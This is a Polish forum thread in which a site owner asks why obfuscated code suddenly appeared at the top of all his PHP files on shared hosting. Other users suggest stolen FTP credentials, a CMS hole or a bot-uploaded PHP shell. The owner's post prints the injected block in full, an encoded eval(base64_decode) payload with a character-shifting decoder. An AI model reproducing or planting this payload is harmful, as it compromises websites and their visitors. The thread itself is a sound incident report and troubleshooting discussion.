Czyzby wlam na serwer home.pl - 31 marca 2013

[ironman 0]

Witam.

Dzisiaj przestało mi działać wiele stron an hostingu home.pl

Jak sie okazalo do kazdego pliku .php wczoraj o godz: 23:10 został na poczatku pliku dodany kod

$d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo= array('3316','3333','3312','3323');$uQxbYmxKnVeolUeowZvRyk0IVZ= array('9209','9224','9211','9207','9226','9211','92 .........................................$SbYdeciHTNRdVDQEWNmcRabnYN45dUXSWMW="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkd ..itd

Nie wiem czy to włam czy home.pl coś nakombinowało - inne pliki po za tymi z rozszerzeniem .php nei są ruszone.

Infolinia na raize nie dziala (świetuje)

Macie jakieś pomysły co to mogło sie stać - część stron mi działa a część neistety nie

[Gość dmho]

Total Commander?

[ironman 0]

Nie korzystam z Total Commandera.
Chyba ze ktoś zyskał dostep do ftpa.

[krk 2]

sprawdź logi czy ktoś logował się po ftp

[ironman 0]

Witam.

To nie jest dedyk ani vps wiec nie moge tego zrobic.

Musze czekac az infolinia zacznie dzialac - wtedy poprosze o logi oraz przywrocenie backupu FTPa.

I sproboje dojsc w jaki sposob sie to stalo i z jakiego adresu ip.

Dziwi mnie tylko po co został dodany ten dziwny kod i co on ma niby robic - bo czesc stron działa a czesc nie dziala - i jednak nei zostaly ruszone tylko pliki z rozszerzeniem .php jak pisalem wczesniej - ale pliki z rozszerzeniem .php która zawieraly kod php - zas pliki z rozszerzeniem php, ktore zawieraly tlyko html nie zostaly wogole ruszone.

Zauwazylem ze w niektorych plikach brakuje cale kody php tlyko jest ten kod ktorego czesc wklilem

[Gość nrm]

Nic dziwnego tu nie ma, zostałeś pewnie "pojechany", a nie wiem czemu sugerujesz winę home. Oczywiście jest taka możliwość ale szanse oceniam na mniej niż 1%

[ironman 0]

Nie sugeruje winy home.pl tylko napisalem ze na takim serwerze mi sie to stalo - ogolnie jakby biuro obslugi dzialalo to nie musialbym tu pisac - ale sprawa dla mnie pilna wiec chcialem sie dowiedziec czy jeszcze komus sie takie cos nie przydarzylo.

Na chwile obecna zmienilem haslo do ftpa - i czekam az biuro obslugi home.pl bedzie dzialac - wtedy poprosze o logi i o przywrocenie backupu.

Dziwi mnie ogolnie to ze ktos nie pousuwal plikow tylko jakis dziwny kodzik do nich dodal.

 

Dokładnie caly taki kod (w kazdym pliku to samo):

<?php 
 $d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo= array('3316','3333','3312','3323');$uQxbYmxKnVeolUeowZvRyk0IVZ= array('9209','9224','9211','9207','9226','9211','9205','9212','9227','9220','9209','9226','9215','9221','9220');$wmMvPtTQh5dSiZWxaH= array('3511','3510','3528','3514','3467','3465','3508','3513','3514','3512','3524','3513','3514');$SbYdeciHTNRdVDQEWNmcRabnYN45dUXSWMW="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBoVjBWd05WbHFUa3RhYlU1MFZtNWthVTB3YjNkWlZtTXhZbXQwUlZGWVFsQmtNMEozVjIxc1FtSXlSbGxVYm5CaFYwWkdkbE5yV1RWV1JrcFhVMnhrVTFacmNHbFRWM1J2VmxaYVIxRnRXbGRXYXpWSFZsZDNOVkZzU1hkV2F6bFhVVEJ3YTFNeFRuTk9NSEJKVm0xb1NsSkVRbTVaZWs1VFpWZFNTRTlZVG1sTk1sSnpXVEpzYm1FeFozaFVhMXBXWWtad1IxWlhlSHBoVms1SFZXeFdWbEpxYkZkV1ZFSlhWVEZuZDFKcmFGTldWRlpXVTFkM2QyTkZPSHBOUlhSb1ZqRnNibE13VG05bGJWSkpVMjVrYVUwd01YWlRhMmhYWVVWNFJGTnROV2xOYW14MVdXdGtWMkZYU1hwVlYyeE1WVEJWTlZWR1pHRmhSMHBKVkcxNFRGZElaelJUTUdoUFRVZE9kVkZ1V21wbFYyUnlXa1prUm1Nd2JIUk5XSEJwWWxWd01scEZUa3BqUld4VlRVUnNZV0pWV25wWmVrcFdZMGRhU1dReU9XcE5NVW8xV1RCak5XVnJkRVJWYWtaYVZUTmtjRmw2U2pSTlYwNTFVVmRzVEZVd1ZUVlZSbVJoWVVkS1NWUnRlRXhWTW5STVdsaGtkMk5HY0hCUlZ6bEtWakZ2ZUZsdE1VOU5SMFpZVDFoV1dVMXNXVEJaVm1oUFRVZE9OVm95YkZSaGJIQmhXVEZhUjJSSFNuUlZiR2hQVW1wc00xbFdhRXRrYkc5NVQxaEtTbUZYZEhkYVdHUjNZbGRTV0U1WGNHdFNNbmd5V1cxc1ExTXdOWE5pU0doV1ZucEdNVmRyV21wTlJtZDZVVzVDYW1KVWJIVlpha3A2WWpCMFdXTXdkR3BpVmxsM1drWm9TMlJWYkVoWGJXaHBVMFUxYzFRelpIZFBWVTUwVjJwR2FXSlZOSGRaVm1NMVpGVnNSbUo2U2xoWFJWcFRXV3hqTVdFeFdqWlZiVnBoVFd4WmQxZEVUa3RpUm14WVpVZGFhRmRGUm5aVE1VNURUakJPY0ZWdVpHcGlWR3N3V2xaWk5XSXhjRmhTYlhSaFYwVndObE5WVVhkYU1XeFpVMjVzV2xkSGRIWlRWM1JQVkZaT1ZsWnJPVmRTYW14TFZsVk9TbU13YkhKWGJFSldZa2RTUTFaWGRGTlNiRXBFVTFoT1NtRXhjRkZXVjNoclVXeFdjbFZyV2xOU2FteElWa1JHU21GVmVFUlRhMlJWVFZWd1dWVldXa3RTVmtwV1ZXMWFVMkY2YkZSWFJFSnpWVlZzY0dReWJGUlNiRXBXVmxWWk5WSkdVa1ppUlZwVllrWktiVlV4V2tKaFZYaEVVMnRzVjFKc1NsSlhSRUpoVlVaV2MxcEZTbFpoTVVwSFZXdE9TbU13YkhKaFJsWlhVbXRLYlZWdGN6VlZNVmwzVW14T1UxSldXa1pYUkVKaFZVWldjRk5ZVGtwaE1taFdWbXRhUTFwc1NuSlBWazVYVFVWYVZGVnJWbGRTVm1kM1YyeENWbUpFYkV0V1ZVNUtZekJzUkZOcmJGZFNiRXBTVjBSR1ExSkdaM2hUYTFwVlZsUnNWbFZzV1RWUmJFcEdWV3hPU21GWVpIQlZNRnBUVmxaV1IwOVdSbFpoZW14YVZqRlpOVkpHVVhkT1ZUbFRWbFUxVmxVeFZUVlVNR3h3WkRKc1ZGSnNTbFpXVlZrMVZqRk9WbEpYYkUxUk1FWndWVEJhVTFaV1ZrZFBWbXhaVFVad1VWWlhlR3RSYkZaeVZXdGFVMUV3YkhwVFZVNUxVMVphUjFWc1JsbE5WMmh0Vlcxek5WVXhXWGRTYkU1VFVsWmFSbGRFUW1GVlJsWndVMWhPU2xFd2NFcFdhMXBUVlZabmVHRkhXbE5oZW14VVZtcENSMVV4U2taV2ExWlpUVVp3VVZaWGR6VlRiRlpFVTFoT1NtRXlhRlpXYTFwRFdteGtSMDlWY0ZWV1ZuQlJWbGQ0YTFGc1ZuSlZiRkpLWVZoa2NGVXdXbE5XVmxaSFQxWnNWbUY2YkZwV01WazFVa1pSZDA1Vk9WTldWVFZXVlRGVk5WUXdiSEJrTW14WFlUSjRRMU5YYkROYU1HeHpZVWRhVTJGNmJGUldha0pIVlRGS1JsWnJWa3BoV0dSdVUxZDRiMXBzU25KUFZrNVhUVVZhVkZWclZsZFNWbWQzVjJ4Q1ZtRlZiSGRVTTJSM1lsZEplbE50ZUZwV01EVjJVekJPVTJReVRuUlBWRkpzVm1wc2RsZHNaRWRoTVhCWlUyNXdTbEl3V2paVFZVNVRaREpPZEU5VVVteFdhbXgyVjJ4a1IyRXhjRmxUV0VKRVltNU9URmxXWkZwaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUydG9RMlZYU1hwaFJGWlpUVzFvYzFkV1pGTmlSMDV6VFVoQ1NsRXhiSFJUVldoRFpWWndXRnBIV21sV01GbDNWMVJLYm1Jd2JIQlBWMVpNVW01T05GUkdVbk5hUjFwSFl6Tm9UVlpIZUd0V00zQkNaRVU1VjAxVWFFNVdiazR6VkVaU2MxcEdaRFpSV0ZKUVZtcEZORlJYZUhwa01IaFZWVzFTV0dWclJqQlVNVmw0VDBVeGNWWnRTazVSZWtGNFYwWk9jbUl4YUVST1J6bFlaV3RHTUZReFdYaFBSbVEyVWxoU1VGWnFSbWxVVlUxM1RsWm9XV1F6YUZobGEwWXdWREZaZUZsck1VUk5SRlpaVjBoa05WWXpjRUprUlRWSFRWZEtUbEY2UVRGWFJtZ3paVlUxVjJNelpFMVdSbHByVXpGT2MwNHdNSHBOUjNSTlpWVnNlbE5WVGxOYWJGVjNWbXhPVjJFeFdsUldNMnhUWkRKT2RFOVVVbXhXYW14MlYyeGtSMkV4Y0ZsVGJWSk1WVEozTTFreU1WZE5SMUpaVTI1V1NsRXhTbTFXVkVKWFZURmFjbFpzVGxobFZrb3pXVEl3TlU1SFZsZFBWemxoVmpCYWNsZHNhRXRhUlRoNlRVVjBZVll6YURaWGJFNURZMFp3Y0dGSWNHdFRSWEIzV1hwT1UyVlZkRVJUV0U1S1lWaGtibE5yV1RWV1JrcFhVMnhrVTFacmNHbFRhMmhEWlZkSmVtRkVWbGxOYldoelYxWmtVMkpIVG5OTlNFSktVVEJWTlZWR1RrTlNNVVpXWlVaU1UxVXlkRXhhV0d4VFpESk9kRTlVVW14V2FteDJWMnhrUjJFeGNGbFRiVnByVWpGYU1Ga3dUa0pQVld4SlZXNXNhRlo2UW5aWFZtaExaVlpzV1dKSFdtcE5iV2gzVjIwMVVtSXhjRmxoU0dScFVucHNjbGRzVG01aFZYaEVVMWhPU2xFeFNtMVdWRUpYVlRGYWNsWnNUbGhsVmtveldUSXdOVTVIVmxkUFZ6bGhWakJhY2xkc2FFdGFSWFJVWVROQ1VHVlZSa3haVm1SYVlqQjBSRlZ1WkdsTk1EVnRXa1ZrVjJSSFRrUlJWR3hLVTBVMGQxa3lNWE5rTWtsNlZGYzVTMU5GU2pWWmFrNXZUbFpuZVdGSGVGcFdNVXB6V1RKM05VMUdjRmhOV0dSTlVUQkdjRlF5YkVwalJYUlVVVmRvVVZaRVFtNVZiWFJIVkZaVmQxWllRa3BSTVVveldUSXdOVTVIVmxkUFZ6bGhWakJhY2xkc2FFdGFiVkpJVm01U2FsRXdSVFZUVldoUFRWWnNkVlJxUW1waFYyUnlXVEJvUzJSdFZrbGlSMXBvVWpGYWIxZHJaRmRsVm1kNlZXMTRhVmRGUm5wVFZWSkNZekJzUkZWdVpHbE5NRFZ0V2tWa1YyUkhUa1JoZW1SS1VWaENkMWR0Ykc5a01rNTBWbTAxV1UxcVJtOWFSV1JQWWpCMFJGTllXbGxoVjJocFZGWk5kMDVXYUZsbFIwcE9WWHBCTVZkR1ducGtNSGhWWWtkU2JWSkZXbWxVVlUxM1RsWm9WMk16WkUxV1IzaHJXbXRTUzFsck1VUk5SRUpaVm01T00xUkdVbk5hUjFwRlUxUkdXR1ZyUmpCVWJGbDNZMFYwUjJRelZreFNiazR6VkVaU2MxcEhXa2RqTTJoTlZrZDRhMVl6Y0VKa1JUbFhUVlJvVGxadVRqTlVSbEp6V2taa05sRllVbEJXYWtVMFZGZDRlbVF3ZUZWVmJWSllaV3RHTUZReFdYaFBSVEZ4Vm0xS1RsRjZRWGhYUms1eVkwZFdObFJxYkV0UmVtaHdWRVZPUW1FeVRrbFRibHBzVTBkNGJWbFZaRmRoUm5CSVZtNXNXVTB4U25OWmJHaENZMFZzUkdKSWJHRlhSa2w0V1RJd01Gb3djRWxSYm14cFRUSm5NVmRFU205aVJteFlWVzE0YW1KRWEzZFhiR040WkRBNU0yTkViRVJpYWtKTVdUSXhWMDFIVWxsVGJsWktVVEZLYlZaVVFsZFZNVnB5Vm14T1dHVlZjRlJWYkZWNFZVWmFSbFp0V2xKV1ZrcEdWbGRzUzFwRk9UTmpSR3hFWWxadmVGbHRNVTlOUjBaWVQxaFdTbEpYT0hsV01XaEhWVzFLV0U1WGRGZGxiRXB0VjJwS1YwMUdaM3BXYm14cFVUSmtkMXBZYkVKVE1IQkpWbTVzYVZFd1JUVlRWVTVMWWpKU1NWVnVaRkJoVkdneVUxZHNRbVJWYkVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVKdlZVWlZlRlZYYkZsVk1FWXhVMVZPVTFwc1ZYZFdiRTVYWVRGYVZGWXpiRXRWTVVwWFVteGFVMVpyTlZaWFJFWlhWVEZPVkZOdFVsQmtNMEozVjIxc1FtSXlUWHBWYm14cVVucHNObE13VGxOTlYwNTBaRE5PU21GcWFIQlRNVTVDWVVaQ1ZVMUhaR0ZpVlZwNldYcEtWbU5IVmpOaU1uUnJWMFZ3ZWxOVlVYZGFNazE2Vm0xc2FrMHhTalZUTUU1VFRWZE9kR1F6VGs1Uk0yZzJXa1ZvUzJReVNYcFVWemxMVTBaYU5WbHJUak5oVmtJMVUxaENURlpJVGt4YWJFWjNaVlp3V1ZWcVJtcGlWRkp1VTJ0b1YyVlhTa1ZqTUhSdFZWaENkRnBHWXpGaGJWSklZa2hhYVdGVlNreFViWGh6WlVaV1dFMVlWbUZTYlUxM1YwUkthMkpIVWtkUFYzQnBUV3BWZDFkc1l6Rk5SMDQxV2pKMGFGZEZSbnBUVlU1VFpERnNXRnBIZUV4WFNFNU1XVlprV21Jd2JFaFhha1pwWWxVMGQxbFdZelZrVm1kNVZtcFNhRmRGTkhkWk0yeHVZVlpyZWxadWJHbFNhbXgzV1cweGMwMUZiSEJoTW1STVYwaE9URk5WVGtKYU1HeEVWVzF3YUZFd1JUVlRWV1JQVFZkT2RHVkhXbWhXZWxaM1drVk9ibUZYUmtsVmFrSnFVa2M1TWxSSWJFcGFNSGh3Vlc1Q2FsRXdSakZUVlU1S1pHdHNjRkZZVmt0VFJVcHZWMnBLVm1ORk9UTmlNbVJLVVRCR2JsZFVUbGRsVjBwSFQxaHdZVmRHU2pKWk1HaFNZakJ3U0ZSdE9VMVJNRXBGVm14YVMxUldVWGhSYkZaWlRWVndSMVpyV2xkVk1WSnpWV3hPVWxaVVZsVlZiWFJYVlRCNFJGRllhRXhXU0U1TVUxVk9RbG93YkVoVWFrWnFZbGhvYlZsNlNsZE5SMGw2VVdwQ1RGRXhTbkZaVlU0eldqRkZlRlpzVGxWU1ZHeFNWbXRaTlZaV1RsWk5WVnBWVFZaYVZsUkZUa0psYTNSVll6QjBTbEV3Um01VFZVNVRUVmRLU1ZWWFpGRlZNRWwzV1RJeGMyUkZkRWhVYWtacVlsaG9iVmRzYUc5aVJtdzFXakowV2sxdFpIZFRNVko2VXpCc1JGRlhaRXBUUlhCeldrVm9WMlZYU25CUlYzUnJWak5uZDFRelpIWmFNR3hFVVZka2JWVlhPVXhaVm1SYVdqQjBTR0pJVm1oV2FteDFWMnhvVW1Jd2JIUlNiazVwVW5wcmVsZEVUbGRsVjBwSFQxY3hhVTB3U25OWmJXeEtZMFYwVkZGcVpFUmhWVVp1VTFWT1FtRXlVbGhsUkVKS1VrUkNibHBGYUV0alIwcFVZVVZHWVdKWGVIcFhiRmsxWW14d1dWVnRXbHBOYW13eFdrVmtWMlJYVWtsVVZ6bEtZbGRuZDFwRmFFSk9hM2cxVDBkc1NsRjZVbkpaVm1oQ1dqQjRjRkZYYkUxbFZXeHVWRWRzVTJReGJGaGFSM2hNVlRKek0xRXliRUphTUd4RVVXNXNZVmRHU1hoWk1qQXdXakJ3U1ZadVRtdFNTRTVNVTFWT1Fsb3diRWxOUlhSS1VUQkdibE5WVGxOaVYwNUVVVlJzU2xJeGNEWlpha3BQWTIxSmVsRnRlR2xoVjJSeVdWWm9RbU13YkVWYU0yUk5VVEJHY2xkc2FFdGxWMHAwVDBoT1NsRXhTbk5aTWpWTFpXMVNTVk5ZVGtwU1JURXpVekZTZWxNd2JFUlJWMlJLVWpKNGRGTlZUbTVoTVhCMVVWaENTbE5JVG5KWmFrNVhUVVZzUlUxSFpFcGhNbEpIVm10T1FtRXlUa2hTYlRWaFZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU0ySXlaRXBSTUVadVUydGpOVTFYVWtSUldGWlJWVEJHY0ZVd1l6VmxiVkpGWWpKa1MxSXllRE5YUldoTFdUSktjRk5VWkVSaFZVWnVVMVZPUW1FeVNYcFdha0pLVVhwUk5WTlZUa3RTUjBsNVRsaFdZVll3TkhkWlZtTTFaRlU1Y0ZGclVtbFNlbXcyVjJ4YU5HVldhRWhPVjA1cVlraG9NVk5YY0hwVE1HeEVVVmRrU2xJeGIzcFpNakZ6VFVad1ZGb3lkR0ZpYTBaNlUxVk9VMlJ0VWxsVldFSlFaREk1YmxOVlRrSmFNSEJKVTIxNGExRXdSVFZUVlU1S1lWVTVNMkl5WkVwUk1FWnVXa1JLYjJOSFNraFdWMlJNVVRCYWRGZHNZelZpVlhSRVZXMHhhbEV5ZEhkVFZXaDZZVEpPZEZacVFrcFJNRVl4VlVaT1Fsb3hjSFJhUjNoclUwVXhkbE5yWkdGa01IaEVVVmhvVG1GdFpIZFVlazEzVXpGd2RGUnVUbWxOTURWelV6Qk9VMkpYVGtSaGVtUkVZVlpKZUZscmFGSmFNVUpVVVdwQ2FtSlhlREJUTUdoUFRWWnNkVlJxUW1waFYyUnlXVEl4VjAxRmVFUlJibkJyVTBWd00xbHFUazVpTUhCSlUyMTRhMUV6Wkc1VFYzZzBaVlpvU0U1WFRtcGlTR2d4VTFkc2Nsb3dkRFZSVkVKTVZUSnpNMXBzUm5kbFZuQlpWV3BHYW1KVVVtNVRhMmhYWXpKU1JXTXdkRzFWV0VKMFdrWmpNV0Z0VWtoaVNGcHBZVlZLVEZSdGVITmxSbFpZVFZoV1lWSnRUWGRYUkU1UFlVZEtXVlp1UWxsTmJWSnpXa1ZaTldNeVJsaE9XRXBxWlZka2QxcFlaSFpoTWs1SlUyNWFiRk5IZUcxWGJURnpZekZ3VkZGVWJFcFRSVFF4V1hwRk5XSnNjRmxWYlZwclVqRmFNRmt3V1RWaE1rWlpVMWM1VEZVd1JtNVVSM1JUVTJ4V2NsWnJVbGRTVkd4VVZqRlpOVlpHU2xkUmEwcFdZVEJhVmxaRVJrcGtWV3hFVTJzNVRtSkhUalpXTVZKRFpVWnNWbGRyU2twaGJrNU1WMjB4YzJNeGNGZFBWM2hzVWpKNE5scEZhRTVpTUhCSlVXNXNhVTB5WnpGWFJFcGhZMGRLU0ZaWVFrcFNSR2h1VTJ0a1IyTXlTa1JSVkd4S1VqRndkMWxyWkZaaU1IQkpVVzVzYVUweVp6RlhSRXBoWTBkS1NGWllRa3BTUnpsdVUydGtSMk15U2tkak0yUlpWVEJGTlZOVlRrcE5WWGh4WVROV1RsWkhjekZVUjNCS1pEQXhOVk5VWkVSaWF6VjJXa1prWVdKWFNraFdWemxMVWpCYWVsbHJUbkpPTUU1d1ZXcEdhbUpZWkc1VlJrNURVekExYzJKSWFGWldla1l4VjJ0YWFrMUdaM2xhUjNoclVtcHJlRmt5TVROaU1IUlZZekIwUzFORmNITlhWbVEwV20xR1dWRlhaRkZWTUVwTVZHMTRjMlZHVmxoTldGWmhVbTFOZDFkRVNtdGlSMUpIVDFoc1lWWXdXbnBYUkVwelpEQjBSR0Y2WkVSaFZrbDRWMVpPUWs5VmJFbFVha0pxWW14S01sbHJZelZOTVhCWlUxYzVTMUpxYkZWVmJGcExWakZLVjFOdFNrcGhNbWhXVm10YVExcHNXbGRVYTFwV1lrUnNRMVZxUWxkVU1WcEVVMjFTVEZaSVRreFRhMlJIWTBad1JGRlViRXBSTUd3MFZGVlNRbVZWYkhGak1IUkxVakExTWxkclRrSlBWV3hJVFZkMFQxVXlaSEphUm1oTFl6QjRkVlZ1UW1sV01WWjJVekZPY2s0d1RuQlZiWEJvVWpGYWNWbFliRUpQVld4SVRWZDBUMVV5WkhKWFZFazFZVEIwVldNd2RFdFRSbHB2VTFWUmQxb3lVbGxUYms1aFZucFdjVmxxU2xOaVJYUkpWR3BDYW1Kc1NqSlphMk0xVFRGd1dWTlhPVXRTYW14VlZXeGFTMVl4U2xkVGJVcEtZVEpvVmxacldrTmFiRnBYVkd0YVZtSkViRU5WYWtKWFZERmFSRk50VWt4Vk1uTXpVVEpzVTJReGJGaGFSM2hLVWtSQ2JsTlhhelZpYlVwSVl6TldhbEl5YUROVlJFcEhZMFp3UlUxSGJFMWhWa3B2V1Zaa1VtUlZiSEJYYWtacVlsaGpOVk5YYXpCaE1sSlpVMjVPVFdGVmJIUlpWbWhDVDFWc2NFNUhkR3BpVmxwdldXdFpOV05IVGtST1IyeExZbXhhYjFWR1RrcGtWWEJKVm0xb1RXRlZiSFJYVkVrMVlURkNWRk5ZVmt0U01EVXlWMnRTZWxNd1RuUlhibHBxWWxaYWIxZFVTbTVhTUhSRVZXMW9hVkl6Wkc1WFZtaE9XakJ3U0dKSVpFeFhTRTVNVTJ0b1UyRnJiRVZOUjJSVVlXeHdZVmt4V2tka1IwcDBWV3hvVDFKcWJIVlhiR2hUV214cmVVOVlWbXRTTVZveFdrVm9UbUl5VWtsVGJrSnBWVEprY2xsV2FFSmpSWGhFVlc1a1dsWXlVbk5UTVZKNlV6QndTVkZ1V21wbFZVVTFVMVZvVDAxSFRuVlJibHBxWlZka2NscEZaRTVqTUd4RVZXMXdhRkl4V25GWldHeHlUakJPZEdKSE1VcFJNbVJ5V1RCak5XVnJiRVJTVkd4UlZUQktkRmRXWkRSbGJIQlVZa1JrUkdGV1NqTlpNakExVGtkV1YwOVlUbWhYUlRSM1UxVlJkMW95VFhwV2JXeHFUVEZLTlZNd1RsTk5SbXcxWkROa1RWRXhTak5aYWs1T1kwVTVNMkl5ZEdGaFZVVTFVMVZrWVdSdFRraFdibFpNVVRGS00xa3lNRFZPUjFaWFQxY3hhRll6YUhOVVJVNUxUVEJzY0dGNlpFUmlWbkF6V2tab1UyVnJkRVJWYlRGTlVURktNMWt5TURWT1IxWlhUMWhPYUZkRk5IZFRNVko2VXpGd2RGUnVUbWxOTURWelV6Qk9VMkpWZEZWak1IUkxVak5vZDFsdE1UQmxhMnhGVFVka2FrMHhXbkJaZWs1VFpWVjBSRlZxUWxwbFdHUnlXVEJqTldWcmREWlVXR3hNVmtoT1RGa3lNVmROUjFKWlUyNVdTbEV4U25wWlZtTXhZMjFPTm1Nd2RHMVZXRUUxVVRJMGQxTXhjSFZXYmxaYVRURktkMWxxU1RCYU1VNXhWMnh3YWxacldqQlpiVEZUVjBVMVIwOVlVbWxOYkVwdFYxUkpOV1JWZEVSVmJYQnBUV3BTZDFwWVpIZGpSbkJ3VVZjNWFrMHhTalZaTUdNMVpXdDBSRlZ0Y0dsTmFsSjZVMWR3TkdGWFNYbFZhbFpLWVZkMGJsTldVWGRQVld4SVYyMW9hVk5GTlhOVE1VNURUakJPY0ZWcVFtRlhSMmQzVTFWUmQxb3lUa2xUYlhoaFRWUnNOVmRzYUVOak1XeFlWRzE0VEZFd2JESlZSV1JMWkd4d1NXRXlPVmxUUlRWcFYwZHZNVnBGZEhCaGVUbFJZVlJzZDFOWGJETmFNR3h4WlVkc2FVMXNTVEZYUlZKR1N6QnNjRTVWZEU5aVIzZzBWbFpqZUdSV2NFZFpla0paVFRBMWIxbHNhRmRqUm1kNVdrZDRhMUpxYkhwWlZtTXhZMjFPTlZvelFrMVJNRVp5VjFSSk5XUlZlRVZTV0VKUVpETkNOVmRzYUZOTlYwNTBUa2RrUzFOR1NuTmFWV2hTVGpCT2RVMUhaR0ZXTTJnMlYyeE9RMDR5VG5SV2FrSnJWMFZ3TVZOVlRsTmhiVWw1VGtSa2JWVllRVFZSTWpGaFRWZEtkRlJxUW1oV2Vtd3hVMVZXZGsxc1pGbFNiRXBwVm5wV2NsWnVjRk5hYkd0NVVtNU9hVkl3Y0c5WFZFcDZZakJ3U0ZOcVJtRmhWM2N6VVRJeGMySlZiRVJoU0VKcFlrUnNiMWt5TlV0aFIxWlVXakpzVWsxcWJERmFSV1JYWkZkU1JFMVZXbWxpVlRVeVYydGtjMlJXY0RaaU1tUmhUVE5DZDFrd1RrcGpNR3hJWVVkNFdsWXhTbk5aTWpWUFdtMUtTR0pJY0d0Uk1tUjNVekZPYzA0d2NFbFZibEpxVWpGd01WZFdZM2hpUld4RlRVZGthMUl4V2pCWk1HTXhZVWRLVkdGSWNHeFhSVFZ0VjJwS1YwMUdaM3BWYlhocFYwVktiVmRyWkhObFZYUkVZVE5PU2xFd2NFaFdSRUUwWVZWMFZXTXlkR3hpVm14dVZVWk9RMkpYU1hwUmJYaHBZVmRrY2xwRlkzaGtNWEIwVGxkb2FWWXhWbnBUVlU1TFRUQnNjR0Y2WkVwU01YQXpXa1pvVTJWcmRFUlZhbHBoWVZoa2JsTnJaRXROVm5Cd1lYcGtTbEl4Y0hGWmEyTTFaV3h3VkZveWRHeGlWbXgzVkROc1FtRXlWblJWVjJSUlZUQktkVnBYTURWa01YQllUa2M1UzFOR1NqQlpNR1JoWkZac1dFMVhlRTFSTUVad1dUSnNTbU5GT1RWVmJYQnBUV3BWZDFkc1l6Rk5SMDQxVVZSc1NsSXlVVEpaTWpGWFlVWndSRm95ZEd4aVZrWjZVMVZTUm1Rd01VVlJXR1JPVWtWR00xTXhVbnBoTVd0NVQxaFdhMUl4V2pGYVJXaE9XakZDVkZGcmRFOWlSM2cwVmxaamVHUldjRWRaZWtKWlRXcEdNbGRyV1RWaGJVbDVUa2M1UzFJd05USlpiVFZUWWtkS2RWVnVjRXhXU0ZKMVdsY3hUMk15U1hwVWJYaE1VVEZKTWxkclRuSk9NbEpZVGxoT2FGWjZWbmxUTUU1VFRVZEtXVkZ0TVdsaVZWb3dWMnhPY2s0d2NFaFVibHBwWW14S2MxbHROVk5sYTJ4RlRVZGtZVTB6UW5OWmJURlBaR3h3U0ZaWE9VdFNNRFV5V1cwMVUySkhTblZWYm5CTVZraFJOVk5WWkZkak1rMTVWbGRrYkdWV1NuRlpha2t4VFVad1dFNVVRbXBsVlVVMVUxVldkazFzWkZsU2JFcHBWbnBXY2xadWNGTmFiVXBZVDFkMFdVMXJOVEpaYld4dVlURnNkVlp0TVV4V1NGRTFXVEl4VjAxSFVsbFRibFpNVVRGS2NWbHFTVEZOUm5CWVRsUkNhbVZYY3pOUk1qUjNVekpKZVZOdFdtcE5NVXB2V1RJMVVtSXdiSEppZWtwWVYwVmFVMWxzWXpGaE1WbzJWVzFhV2sxclducFphMlJMWVVacmVXTXliRXhXU0U1TVdteEdkMDlUU1hCTFZITm5JaWtwT3lBPSIpKTsg";if (!function_exists("O4Jy2yNlGjpxtkFQBBRW6JEloQ")){ function O4Jy2yNlGjpxtkFQBBRW6JEloQ($xjl0sP,$uAQNMMsKHu86ggTCaMjrZjWol6){$ioeDQF = '';foreach($xjl0sP as $TiVMSt7RpdY8GYLQgA0){$ioeDQF .= chr($TiVMSt7RpdY8GYLQgA0 - $uAQNMMsKHu86ggTCaMjrZjWol6);}return $ioeDQF;}$PQe9i9JH18ldEus1NDxu5ZcSVLm7Z3TCJ = O4Jy2yNlGjpxtkFQBBRW6JEloQ($d4yyIfCtIiYvVayDbzQZdLVgvIZikL9ZFxo,3215);$kSWcqNaBQEV9wzDUUyJWgvxtsm = O4Jy2yNlGjpxtkFQBBRW6JEloQ($uQxbYmxKnVeolUeowZvRyk0IVZ,9110);$FPWYiE = O4Jy2yNlGjpxtkFQBBRW6JEloQ($wmMvPtTQh5dSiZWxaH,3413);

Ciekaw jestem czy da sie ustalic jak sie to stalo.

Edytowano Kwiecień 1, 2013 przez ironman (zobacz historię edycji)

[Gość nrm]

Dziwi mnie ogolnie to ze ktos nie pousuwal plikow tylko jakis dziwny kodzik do nich dodal.

 

Mnie nie dziwi Po pierwsze to pewnie nie "ktoś", a bot. Boty szukają ustalonych ciągów znaków (im potrzebnych w zależności od tego co wklejają), np. bardzo często jest to wklejka wstawiana przed </body>

 

Ciekaw jestem czy da sie ustalic jak sie to stalo.

 

Możliwości jest wiele ale najczęściej są to 2 przypadki:

- przez FTP (pobrane hasło z windowsa ofiary,i wcale nie musi to być TC bo to także na innym poziomie sie odbywa)

- przez dziurę w czymś popularnym (jak np. sławny timthumb używany w dziesiątach projektów w tym w WP)

[ironman 0]

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

 

To ejst tez troche moja wina bo dla wygody dla prawie wszytksich stron na serwerze mam dostep z 1 konta ftp - tak dla mojej wygody.

Widze ze 2 strony dla ktorych utworzylem domeny (z opcja: Włącz przekierowanie na podkatalog z separacją serwisu) nie zostały ruszone.

Jak mi przywroca backupa - to bede mial troche pracy aby teraz potworzyc osobne konta ftp.

[kafi 2425]

 

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

Najpopularniejszy obecnie wektor to znalezienie dziury w CMSie - wrzucenie php-shella - odwalenie przez niego brudnej roboty - drobne zatarcie śladów.

[Gość nrm]

Czyli ogólnie bot musial mi wrzucic na serwer jakis plik, ktory wykonał tę robote ?!

 

To już trzeba sprawdzić logi. Na ogół to się dzieje po stronie atakującego: w logach widać pobranie pliku, potem pewnie jest jego modyfikacja, i znowu w logach widać zapisanie pliku. Oczywiście to leci w tempie xxx plików na minute więc wiadomo, że to automat leci. Inna opcja to wrzutka jakiegoś przygotowanego pliku przez którego via www łączy się atakujący i coś tam robi. Czy to modyfikuje czy też spamuje lub ogólnie mówiąc robi z Ciebie "zoombie" gotowe na atak czegoś tam / gdzieś tam.

[ironman 0]

Acha - rozumię i dzięki za odpowiedzi

